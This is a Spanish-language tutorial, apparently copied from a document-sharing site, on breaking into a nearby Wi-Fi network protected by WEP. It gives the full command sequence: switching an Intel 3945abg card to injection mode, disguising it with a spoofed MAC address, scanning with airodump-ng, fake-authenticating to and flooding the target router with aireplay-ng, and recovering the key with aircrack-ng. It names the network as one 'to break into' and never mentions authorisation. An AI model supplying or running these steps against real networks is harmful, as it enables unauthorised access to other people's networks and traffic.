Anda di halaman 1dari 2

Elegimos la opción de gráficos KDE.

Lo que haremos es cambiar el modo de uso de la Intel 3945abg para poder monitorear e inyectar paquetes con estos
comandos:

rmmod iwl3945
modprobe ipwraw

*Una vez hecho esto escribimos este comando para ver cómo es que la distribución llama a nuestra tarjeta,
que será la que NO nos marque "no wireless extensions".

iwconfig

Esta tarjeta la camuflajearemos cambiando su MAC, para ello la deshabilitaremos, cambiamos y volvemos a
habilitar:

airmon-ng stop wifi down


ifconfig wifi0 down
macchanger --mac 00:11:22:33:44:55 wifi0
airmon-ng start wifi0

Ahora exploraremos todas las redes disponibles que alcance a detectar nuestra tarjeta con:

airodump-ng wifi0

Ya exploradas todas las redes, pulsamos Control+C y elegimos la red a vulnerar, y copiamos su MAC o BSSID,
ya que la necesitaremos en varias ocasiones más adelante, aparte de ello iniciamos con el proceso de
inyección de paquetes para romper su seguridad con este código:

airodump-ng -c (canal de transmisión) -w (nombre del archivo de captura) --bssid (MAC del router) wifi0

Abrimos una nueva ventana y nuestra siguiente instrucción hará una Autenticación/Asociación con el Router,
si esta es correcta nos regresará una carita feliz como esta --> :-)

aireplay-ng -1 0 -a (MAC del router) -h 00:11:22:33:44:55 wifi0

Seguido y si es bien logrado colocamos el siguiente código para la inyección de paquetes, dado "enter" nos
preguntará si deseamos usar el paquete que nos muestra, presionamos la tecla 'Y' y damos enter, para que
inicie el proceso:

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (MAC del router) -h 00:11:22:33:44:55 wifi0

Hecho todo lo anterior sólo nos resta esperar un poco a que el valor de la columna "#Data" comience a
aumentar, pasados los 10,000 datos intercambiados abrimos una nueva ventana de consola y escribimos:

aircrack-ng (Nombre del archivo de captura)-01.cap

Automáticamente nos llevará a una pantalla donde prueba todas las posibles claves, si los datos de los
paquetes inyectados no arrojaran una clave válida, nos indicará que intentemos pasados cada 5,000 IVs, que
es lo mismo que el número de la columna '#Data', pasados los 160,000 es 100% probable que obtengamos una
clave WEP común de 64 bits hexadecimal, en lo personal he visto una tendencia de usuarios a usar sólo
números, así que a partir de los 10,000 IVs es bueno comenzar a probar, cuando sea descubierta la clave nos
lanzará un texto que dice "KEY FOUND! [Clave]", ese número es la clave WEP que nos pide el router al intentar
conectarnos.

Anda mungkin juga menyukai